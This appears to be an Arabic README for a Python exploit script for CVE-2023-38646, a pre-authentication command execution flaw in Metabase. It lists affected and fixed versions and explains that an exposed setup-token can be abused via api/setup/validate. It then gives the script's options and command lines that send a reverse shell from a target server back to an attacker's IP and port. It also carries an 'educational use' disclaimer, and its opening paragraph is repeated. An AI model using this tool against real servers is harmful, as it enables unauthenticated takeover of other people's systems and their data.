
تتيح نسخ Metabase مفتوحة المصدر قبل 0.46.6.1 وMetabase Enterprise قبل 1.46.6.1 للمهاجمين تنفيذ أوامر تعسفية على الخادم بمستوى صلاحيات الخادم. لا يتطلب الاستغلال مصادقة. الإصدارات الأخرى التي تم إصلاحها هي 0.45.4.1 و1.45.4.1 و0.44.7.1 و1.44.7.1 و0.43.7.2 و1.43.7.2.
ميتابيس (Metabase) مفتوح المصدر قبل الإصدار 0.46.6.1 وMetabase Enterprise قبل الإصدار 1.46.6.1 تسمح للمهاجمين بتنفيذ أوامر تعسفية على الخادم بصلاحيات الخادم. لا يُشترط المصادقة لاستغلال الثغرة. الإصدارات الأخرى التي تم إصلاحها هي 0.45.4.1 و1.45.4.1 و0.44.7.1 و1.44.7.1 و0.43.7.2 و1.43.7.2.
تكمن الثغرة داخل التطبيق في كشف setup-token الذي يمكن استخدامه للتحقق من قاعدة البيانات عبر api/setup/validate. يمكن للمستخدم غير المصرح له إنشاء كود خبيث وتنفيذ أمر تعسفي.
الاستخدام على مسؤوليتك الخاصة
تم توفير هذا السكربت لأغراض تعليمية واختبارية. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن استخدامه. تأكد من الامتثال للقوانين المعمول بها والمعايير الأخلاقية. باستخدامك لهذا السكربت، فإنك تقر وتقبل هذه الشروط.
ميتابيس هي أداة ذكاء أعمال مفتوحة المصدر تتيح لك إنشاء رسوم بيانية ولوحات معلومات باستخدام بيانات من مجموعة متنوعة من قواعد البيانات ومصادر البيانات. إنه مشروع شهير، بأكثر من 33 ألف نجمة على GitHub وقد حظي بقدر كبير من التدقيق من منظور أبحاث الثغرات في السنوات القليلة الماضية.
usage: CVE-2023-38646.py [-h] -rh REMOTE_HOST [-rp [REMOTE_PORT]] -p PORT -l LOCAL_HOST
options:
-h, --help show this help message and exit
-rh REMOTE_HOST, --remote-host REMOTE_HOST
Hostname of the target.
-rp [REMOTE_PORT], --remote-port [REMOTE_PORT]
Port of the Target Machine (default: Port 80)
-p PORT, --port PORT Port for reverse shell.
-l LOCAL_HOST, --local-host LOCAL_HOST
Your IP Adress
يمكنك تشغيل السكربت باستخدام الأمر أدناه. يمكنك تغيير المنفذ البعيد باستخدام الخيار -rp. المنفذ الافتراضي هو 80
./CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
python3 CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>

Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2